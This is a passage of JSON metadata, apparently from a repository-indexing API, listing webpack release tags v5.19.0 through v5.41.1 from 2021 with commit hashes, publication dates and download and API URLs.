0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0